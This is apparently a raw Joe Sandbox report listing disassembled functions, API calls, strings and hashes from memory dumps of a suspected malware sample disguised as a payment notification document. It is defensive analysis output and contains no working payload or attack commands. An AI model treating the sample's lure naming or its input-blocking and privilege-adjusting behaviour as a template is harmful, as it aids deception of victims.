Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a42c544102f997cf4ce39b0e915b6bc2dcf01bebc9ba8b5db679ccd368397494
Instruction ID: e2e9efc095dfae83b282a4a6a5ae04a75bdd7cbee67ab7338c5a2c0491929ecf
Opcode Fuzzy Hash: a42c544102f997cf4ce39b0e915b6bc2dcf01bebc9ba8b5db679ccd368397494
Instruction Fuzzy Hash: 32E0BF72018610EEF7252B65FC05E7777A9FF04310B14882DF6A5D44B1DB626CD0EB50

Function 008ECAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00930C40

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: a6a8b37357e7cb906477487a633f0fb0519d201e8974972c739f47da64ee86c3
Instruction ID: 32025803e6dc25c8dd664b9d3f41975fe865c1ea75f4209b5098b9a0edb42ae1
Opcode Fuzzy Hash: a6a8b37357e7cb906477487a633f0fb0519d201e8974972c739f47da64ee86c3
Instruction Fuzzy Hash: 91328B30E002589FCF14DF95C891AEDB7B9FF46308F208059E816AB292DB75AD46CB61

Function 0091676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00916766,?,?,00000008,?,?,0091FEFE,00000000), ref: 00916998

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
Instruction ID: 39976bf149d9aafd7e17483b39f5305a3773629727e216d00c98f2f64ce14b77
Opcode Fuzzy Hash: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
Instruction Fuzzy Hash: 99B13C31A10609DFD715CF28C486BA57BE0FF45364F298698E8E9CF2A2C335E991CB40

Function 008FB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0093851F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
Instruction ID: e85d3a4d3bb8b0ff5298ec5e5ff6941be1becf46239c9f85521ff08985aa5f66
Opcode Fuzzy Hash: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
Instruction Fuzzy Hash: D6124E759002299BCB14CF68C9806FEB7F5FF58710F14819AE949EB255EB349E81CF90

Function 0095EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0095EABD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
Instruction ID: e64c4a21e3dc0559610bb282085a38e2d5d7fac59684c1db928526116d76223b
Opcode Fuzzy Hash: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
Instruction Fuzzy Hash: 07E09A362002009FC300EF6AD804E8AB7EDFF98760F00841AFC0AC7250CAB0E8408B91

Function 009009D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009003EE), ref: 009009DA

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
Instruction ID: eddb1e0fe77ae660060d07e3f7ede5bf9765c752a4aad2e075b151050108bd06
Opcode Fuzzy Hash: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
Instruction Fuzzy Hash:

Function 0090781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0090798B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 268a52e204e22bf25c1772cea7cdd31a75a5abcca8ced21d63e1340a063aa13d
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 98513661F0C6456FDB3885E888997BFE39D9B42370F188909DC86D72C2C615FE41D362

Function 00916DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
Instruction ID: d290b9d7e4eac3ea43c22ce68aff5427cca76e826eba9e32849b4f9af87258e3
Opcode Fuzzy Hash: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
Instruction Fuzzy Hash: 8D320231E2DF064DD7239634D822325A699AFB73C5F15D727F81AB5AA6EB28C4C35200

Function 008FCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edeac304f097e91971fe257b9f7611fad90f96f9eba89a70c2a1aa35320f0b2b
Instruction ID: 153d6aa585db021329b087c8705fc98958da203db25fad787c143cea8b711f1b
Opcode Fuzzy Hash: edeac304f097e91971fe257b9f7611fad90f96f9eba89a70c2a1aa35320f0b2b
Instruction Fuzzy Hash: CB3248B2A0455D8BCF28CF38C59067DB7A5FF45304F28852AE99AEB291D234DE81DF41

Function 008E7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfeb4a8760be078b3b5129cdfd0de59497bdd4a28647079e9ed2b6097f2fa461
Instruction ID: acc0d0542b4d4a0c0818e64e594941c12c6bd810616169084ddb1951a3c9678a
Opcode Fuzzy Hash: cfeb4a8760be078b3b5129cdfd0de59497bdd4a28647079e9ed2b6097f2fa461
Instruction Fuzzy Hash: A5221470A0461ADFDF14DF69D881AAEB3F5FF45300F204629E816EB2A5EB35AD10CB51

Function 008E91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8cda57face5692fd735bb49400c03acb1d2e1c8841f665521f048f17c72853
Instruction ID: da1e94c02bd83c6903b54297d74fd0b4506b56341a870d4ee6c16c8f716e9bd2
Opcode Fuzzy Hash: 5a8cda57face5692fd735bb49400c03acb1d2e1c8841f665521f048f17c72853
Instruction Fuzzy Hash: DC02D5B0E00219EFCF04DF65D881AAEB7B5FF45300F108169E956DB295EB71AE10CB81

Function 00919EEE Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ff141945011966e0475464416673a8b795c7803e8511d1f0c99ae558b10903
Instruction ID: 717ebe99630f704fa0a01d5e50003719279c674590f0bc9da64c592c82e4ff49
Opcode Fuzzy Hash: 26ff141945011966e0475464416673a8b795c7803e8511d1f0c99ae558b10903
Instruction Fuzzy Hash: 1BB1D130E3AF414DD62396398831336B65CAFBB6D5F91D71BFC2674E62EB2285835240

Function 00901C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 7857858ad71205456a06a1a1ed3ce8677d37f37a63773dbf273a268d27715a8e
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: B39188736080A34EDB2D463E857407EFFE55A923A171A0B9EE4F2CB1C5FE24D954D620

Function 009019B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 894d6014a41ed6f5b8b824972b495a2900cfe312b22cf8259b05d7bdc605518f
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 369176722090E34EDB6D427E957403EFFE95A923A231A079ED4F2CB1C5FE24C564D620

Function 00907A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 690b1dc8ca980446072509a38990e47d954621cf7e6fd6413ca9ec63b49648a6
Instruction ID: 7809dbed4cf1475479144a77622f231daaff9d0cf89150fa8e990b3fff2f9825
Opcode Fuzzy Hash: 690b1dc8ca980446072509a38990e47d954621cf7e6fd6413ca9ec63b49648a6
Instruction Fuzzy Hash: 0C613661F087496EEA3499E88895BBFF39DDF81730F100D19E882DB2C1DA55BE428365

Function 00907CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9210601fd4e3e4295fd8baa945192d569b0518e72f07ec974a657771114194b3
Instruction ID: 69c78567bdb2fbd40bd00c8560327e3bf1f13af0da00840dc927335a8a98c2e2
Opcode Fuzzy Hash: 9210601fd4e3e4295fd8baa945192d569b0518e72f07ec974a657771114194b3
Instruction Fuzzy Hash: E7615971F087096EDE385AE88855BBFE39CAF82730F100D59E982DB2D1DA16FD42C255

Function 00901706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: b4cc6623a777d3776d18d2ca0b1832df52332deff328eb822471304fd61a192f
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8C8185376090A34EDB6D827A857443EFFE55E923A131A479ED4F2CB1C1FE24C658E620

Function 00952046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8945e522d5600e98cf80aec810fdc7950b8d7c9a632eac8869fab957e69c3c71
Instruction ID: ad99e3284b31fbb06e28d3c583134be1a701b128d1f7111752937f79e3a107fb
Opcode Fuzzy Hash: 8945e522d5600e98cf80aec810fdc7950b8d7c9a632eac8869fab957e69c3c71
Instruction Fuzzy Hash: 5C21A8326216158BD728CF79C91267E73E5E754320F15862EE4A7C77D0DE35A904D740

Function 00962ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00962B30
DeleteObject.GDI32(00000000), ref: 00962B43
DestroyWindow.USER32 ref: 00962B52
GetDesktopWindow.USER32 ref: 00962B6D
GetWindowRect.USER32(00000000), ref: 00962B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00962CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00962CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962CF8
GetClientRect.USER32(00000000,?), ref: 00962D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00962D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D80
GlobalLock.KERNEL32(00000000), ref: 00962D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D98
GlobalUnlock.KERNEL32(00000000), ref: 00962DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DA8
GlobalFree.KERNEL32(00000000), ref: 00962DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,00000000), ref: 00962DDB
GlobalFree.KERNEL32(00000000), ref: 00962DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00962E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00962E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0096303F

Strings

, xrefs: 00962FC5
static, xrefs: 00962D3A, 00962E91
AutoIt v3, xrefs: 00962CF2
DISPLAY, xrefs: 00962EA2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
Instruction ID: 09c3e7fbf53c1db45e2c07387f5ed62b3ef6950428cd30aaf7d459ec6b821b94
Opcode Fuzzy Hash: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
Instruction Fuzzy Hash: 5C027DB2610205EFDB14DF64CD89EAE7BB9FB49710F048158F919AB2A1DB34ED40DB60

Function 009770D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0097712F
GetSysColorBrush.USER32(0000000F), ref: 00977160
GetSysColor.USER32(0000000F), ref: 0097716C
SetBkColor.GDI32(?,000000FF), ref: 00977186
SelectObject.GDI32(?,?), ref: 00977195
InflateRect.USER32(?,000000FF,000000FF), ref: 009771C0
GetSysColor.USER32(00000010), ref: 009771C8
CreateSolidBrush.GDI32(00000000), ref: 009771CF
FrameRect.USER32(?,?,00000000), ref: 009771DE
DeleteObject.GDI32(00000000), ref: 009771E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00977230
FillRect.USER32(?,?,?), ref: 00977262
GetWindowLongW.USER32(?,000000F0), ref: 00977284

Part of subcall function 009773E8: GetSysColor.USER32(00000012), ref: 00977421
Part of subcall function 009773E8: SetTextColor.GDI32(?,?), ref: 00977425
Part of subcall function 009773E8: GetSysColorBrush.USER32(0000000F), ref: 0097743B
Part of subcall function 009773E8: GetSysColor.USER32(0000000F), ref: 00977446
Part of subcall function 009773E8: GetSysColor.USER32(00000011), ref: 00977463
Part of subcall function 009773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
Part of subcall function 009773E8: SelectObject.GDI32(?,00000000), ref: 00977482
